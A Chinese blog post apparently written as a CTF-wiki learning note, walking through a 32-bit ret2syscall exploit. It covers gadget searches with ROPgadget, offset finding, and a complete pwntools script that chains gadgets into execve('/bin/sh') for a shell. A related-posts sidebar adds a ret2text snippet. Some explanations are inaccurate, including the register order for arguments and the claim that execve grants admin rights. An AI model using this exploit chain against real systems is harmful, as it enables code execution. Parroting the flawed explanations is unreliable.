CTFWIKI-PWN-ret2syscall

已于 2023-04-19 23:02:03 修改
阅读量623 收藏 4
点赞数 1
分类专栏: PWN的学习 文章标签: linux 运维 服务器
于 2023-04-19 20:41:36 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_64180167/article/details/130251646
版权

该题目是在32位下

目录

先进行checksec

ida

1.execve()

2.寄存器

3.我们需要先看看execve()函数的函数调用号

4.使用ROPgadget来查看

我们先进行查看eax|ret

查看 pop ebx,ecx,edx,ret

查找 /bin/sh的地址

查找int 0x80

5.查看字符偏移量

附上流程图

先进行checksec

ida

发现栈溢出函数 这次我们学习的是系统调用 执行/bin/sh

这个是通过系统调用函数 就是存放在系统中的函数来执行shellcode

这种类型是没有存在shellcdoe的

我们这次要使用到的函数是

1.execve()

类似python中的os.system(cmd) 可以以管理员权限执行函数

这个函数和system()函数的差别就是 会不会返回

system() 会在执行完后进行返回 完成
execve()在语句执行完后不会返回

2.寄存器

eax通常使用与存放函数进行传递和进行系统调用

大多数都是运用eax进行系统调用

ebx ecx edx进行参数的传递

我们这个就是运用 这个概念

通过eax进行调用系统函数

再通过ecx,ebx,edx进行函数的参数传递

ecx通常用于传递第一参数,edx用于传递第二参数,ebx用于传递第三参数


但是要凭借情况而定 这道题就是找到操作进行

3.我们需要先看看execve()函数的函数调用号

这个是查看所有的函数号

cd /usr/include/asm
vim unistd_32.h

这个是直接找execve()的函数号

cat /usr/include/asm/unistd_32.h | grep execve

grep是高级搜索 字符串

4.使用ROPgadget来查看

我们先进行查看eax|ret

来查看 pop eax ret指令

ROPgadget --binary rop --only 'pop|ret' | grep 'eax'

能发现出现了 pop eax ;ret 这就是我们需要的操作 记下他的地址

pop_eax_ret=p32(0x080bb196)

查看 pop ebx,ecx,edx,ret

通过高级搜索 看看 pop ebx,ret的操作

ROPgadget --binary rop --only 'pop|ret' | grep 'ebx'

 返回来很多 有出现 pop ebx,ret

但是其中还有一个

0x0806eb90 : pop edx ; pop ecx ; pop ebx ; ret

出现了我们需要的全部 就是顺序不一样 所以这个变为

ebx为第一参数 ecx为第二参数 edx 为第三参数
pop_other_ret=p32(0x0806eb90)

这就解释为什么和上面我说一般来说参数的分配不一样 还有为什么流程图/bin/sh在ebx

查找 /bin/sh的地址

ROPgadget --binary rop --string '/bin/sh'

 得到了地址

bin_add=p32(0x080be408)

查找int 0x80

int 0x80 是一种在Linux操作系统中使用的系统调用调用方式,它会触发中断信号并将控制权转移到内核态,在内核中执行相应的系统调用功能。该指令通常用于在用户空间中调用底层内核接口,例如文件操作、进程管理等。

但是现在 这个已经给其他调用方法替代了 存在历史性

ROPgadget --binary rop --only 'int'

int_add=p32(0x08049421)

 这样我们就得到了所有的地址

5.查看字符偏移量

gdb打开

cyclic 200
r
cyclic -l daab

 

我们开始编写exp

from pwn import *
p=process('./rop')
pop_eax_ret=p32(0x080bb196)
pop_other_ret=p32(0x0806eb90)
bin_add=p32(0x080be408)
int_add=p32(0x08049421)
payload=b'A'*112+pop_eax_ret+p32(0xb)+pop_other_ret+p32(0)+p32(0)+bin_add+int_add
p.sendline(payload)
p.interactive()

 实现了控制器

附上流程图

execve('/bin/sh',0,0)

双层小牛堡
关注
专栏目录
CTF|HITCON-Training-master lab5 writeup(ret2syscall题型)
skyattractive的博客
06-12 417
CTF|HITCON-Training-master lab5 writeup 题目的文件名是“simplerop” 意思是对rop链的简单利用 shift+f12 查看后,题目既没有给system函数又没有‘/bin/sh’ 大致判断是CTFwiki上基本rop中的ret2syscall类型的题目 大致思路是, 在文件中需寻找有用的gadget 通过题目中存在的栈溢出 将‘/bin/sh’写入文件中的bss段(或者data段) 然后将执行流引导到bss上执行即可 因为文件是32位,‘/bin/sh’需
CTFWiki-pwn
qq_55233040的博客
05-03 1535
stackoverflow ret2text 首先checksec一下,是32位可执行文件,没有开启保护 放入ida,shift+f12查看字符串,发现secure函数中使用system函数调用了"/bin/sh",记下地址0x804863a 查看偏移地址 脚本如下: from pwn import * io = process("./ret2text") payload = b"a"*112 + p32(0x804863a) io.sendline(payload) io.interactive(
pwn基础之ctfwiki-栈溢出-基础ROP-ret2syscall
qq_52658640的博客
04-22 1672
文章目录前言原理系统调用ret2system挖掘漏洞2.读入数据总结 前言 二进制小白的学习笔记,如有错误请大佬及时斧正。 原理 ret2syscall,即控制程序执行系统调用,获取 shell。 系统调用 Linux 的系统调用通过 int 80h 实现,用系统调用号来区分入口函数。操作系统实现系统调用的基本过程是: 应用程序调用库函数(API); API 将系统调用号存入 EAX,然后通过中断调用使系统进入内核态; 内核中的中断处理函数根据系统调用号,调用对应的内核函数(系统调用); 系统调用完成相应
pwn学习笔记(3)ret2syscall
最新发布
qq_66013948的博客
02-13 874
​ ROP(Return Oriented Programming)返回导向编程,主要思想是通过在程序中已有的小片段(gadgets)来改变某些寄存器或者变量的值,从而控制程序的执行流程。
basic ROP-浅谈ret2syscall原理[ctf-wiki]
pointerr的博客
12-17 289
一道简单的ctf-wiki上的基本ROP题目。 原理:控制程序执行系统调用,获取 shell。 传送门 0x01 预备知识: 系统调用通过 int 80h 实现,应用程序调用系统调用的过程是: 1.把系统调用的编号存入 EAX; 2.把函数参数存入其它通用寄存器; 3.触发 0x80 号中断。 execve函数: 详见:execve函数 0x02 解题步骤: 首先检查: ida打开之后,没有system函数,只有binsh关键字,开启NX保护。 需要构造execve(“/bin/sh”, 0,0); 其
ctf wiki rop基础 ret2syscall
weixin_55885866的博客
05-12 105
内核接收到int 0x80中断后,需要查询IDT表来取出中断处理函数地址,这个地方比较细节的地方是,int 0x80的idt表中的DPL被设置成了3,所以才能从用户态能直接访问int 0x80的中断指令的。个人理解:当出现int 0x80 时候 ,进入内核,可以使用eax ebx,。从而执行对应的系统调用。,(不仅会插入中断指令,还会将系统调用编号设置给 %eax 寄存器)查看到 eax 和 esp 的值 如下 通过ebp-eax的值。来主动进入内核,这是用户程序发起的调用访问内核代码的唯一方式。
pwn小白入门05---ret2syscall
weixin_45943522的博客
02-21 3664
ret2syscall ROP原理: 随着 NX 保护的开启,以往直接向栈或者堆上直接注入代码的方式难以继续发挥效果。攻击者们也提出来相应的方法来绕过保护,目前主要的是 ROP(Return Oriented Programming),其主要思想是在栈缓冲区溢出的基础上,利用程序中已有的小片段 (gadgets) 来改变某些寄存器或者变量的值,从而控制程序的执行流程。 gadget: 所谓 gadgets 就是以 ret 结尾的指令序列,通过这些指令序列,我们可以修改某些地址的内容,方便控制程序的执行流程。
pwn07.ret2syscall例题
11-11
ret2syscall例题
pwn练习1-ret2syscall(ROP-gadget)
m0_51756263的博客
10-07 1670
pwn练习1-ret2syscall(ROP-gadget)
pwn小白入门06--ret2libc
weixin_45943522的博客
10-25 8383
概述: 前文介绍了ROP的基本原理,但前面的方法有一些局限性,一旦目标程序调用的函数较少,或者使用动态编译,就会导致我们可以利用的gadget变少,从而无法达到利用效果。为了解决这种问题,我们可以选择使用ROP的方式,到动态链接库里面寻找gadget。即ret2libc。 动态链接库: 说动态链接库之前,先简单介绍一下库,库是一种软件组件技术,库里面封装了数据和函数,比如常用的printf,get函数。前文所说的ret2syscall所使用的程序是静态链接的,即在程序编译的时候就将整个库链接到程序中,一般这
buuoj pwn get_started_3dsctf_2016 ret2syscall
yongbaoii的博客
01-29 384
这里记录的是ret2syscall时候出的一些状况,详细的完整版在下面链接 from pwn import * r = process('./2016') elf=ELF('./2016') context.log_level = "debug" bss=0x080eb000 pop_ebx_esi_edi_ret=0x080509a5 syscall_addr = 0x0806357d pop_eax = 0x080b91e6 bss_addr = 0x080eb000 #gdb.attach(r)
BUUCTF--pwn--inndy_rop【ret2syscall】
qq_73149934的博客
12-24 322
BUUCTF--pwn--inndy_rop
ret2syscall
Maxmalloc的博客
02-08 538
xx@ubuntu:~/Documents/rop$ file pwn pwn: ELF 32-bit LSB executable, Intel 80386, version 1 (SYSV), dynamically linked, interpreter /lib/ld-linux.so.2, for GNU/Linux 2.6.24, BuildID[sha1]=fca490f050dc...
ROP链:ret2syscall
小龙在线
09-13 431
安全机制 ASLR(地址随机化) PIE(加强版ASLR) NX(数据段不可执行) ROP 系统调用 stack canary(栈溢出 写入校验值 ) stack smash 内存泄漏 RELRO got表 延迟绑定 plt 汇编代码 把真实地址放入got got 表单 跳转到libc.so 利用方法: 劫持eip,改为system plt 任意地址写got表,改为system真实地址,相当于调用call system(Got表劫持) 泄露,如泄露got表,里面有printf地址,进而计算出libc地址,
ret2syscall原理详解
Sakura给爷pwn全场
10-27 354
ret2syscall原理详解与实例分析: https://www.freebuf.com/articles/system/234228.html
PWN】07.ret2syscall
weixin_52553215的博客
11-12 2483
Linux 在x86上的系统调用通过 int 80h 实现,用系统调用号来区分入口函数。在 /usr/include/x86_64-linux-gnu/asm/unistd_64.h 和/usr/include/x86_64-linux-gnu/asm/unistd_32.h 分别可以查看 64 位和 32 位的系统调用号。
CTF PWN练习之返回地址覆盖
喜欢Python编程的程序员柚柚呀
07-29 165
函数调用约定描述了函数传递参数的方式和栈协同工作的技术细节,不同的函数调用约定原理基本相同,但在细节上是有差别的,包括函数参数的传递方式、参数的入栈顺序、函数返回时由谁来平衡堆栈扥。本实验中着重讲解C语言函数调用约定。通过前面几个PWN系列实验的学习,我们可以发现在gdb中通过disas指令对main函数进行反汇编时,函数的开头和结尾的反汇编指令都是一样的:push %ebpleaveret。
linux dl代码段起始地址,Linux pwn 之 ret2_dl_resolve
weixin_39789399的博客
05-12 284
原创: S3cana 合天智汇要了解re2_dl_resolve,首先要弄清楚基础的got表和plt表got表 和 plt表plt表,过程链接表,过程链接表的作用是将位置无关的符号转移到绝对地址,当一个外部符号被调用的时候,PLT去引用GOT表中的符号对应的绝对地址。首先我们看一下二进制文件中got表,以及plt表的位置,通过readelf我们可知,plt表的位置在0x8048360处,got表的...
execve系统调用_Linux下的sys_execve系统调用
weixin_32307599的博客
12-31 814
传统Int 0x80系统调用系统调用号:EAX参数:EBX、ECX、EDX、ESI、EDI、EBP返回值:EAX具体功能号在 unistd_32.h 文件中64位系统调用syscall系统调用号:RAX参数:RDI、RSI、RDX、R10、R8、R9返回值:RAX具体功能号在 unistd_64.h 文件中在pwn中一般是使用 sys_execve 系统调用来获取shell的。sys_execve...
mqtt-pwn安装
09-20
安装mqtt-pwn的步骤如下: 1. 克隆mqtt-pwn仓库:使用命令`git clone https://github.com/akamai-threat-research/mqtt-pwn.git`将mqtt-pwn仓库克隆到本地。 2. 进入mqtt-pwn目录:使用命令`cd mqtt-pwn`进入mqtt-pwn所在的目录。 3. 启动mqtt-pwn容器:使用命令`sudo docker-compose up --build --detach`启动mqtt-pwn容器。 另外,您还需要安装以下软件: 1. 安装pwntools:使用命令`python3 -m pip install --upgrade pwntools`来安装并更新pwntools。 2. 安装mosquitto程序和mosquitto-clients客户端程序:使用命令`sudo apt install mosquitto`和`sudo apt install mosquitto-clients`来安装mosquitto程序和mosquitto-clients客户端程序。 请注意,以上步骤假设您已经在Linux环境下进行操作。
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值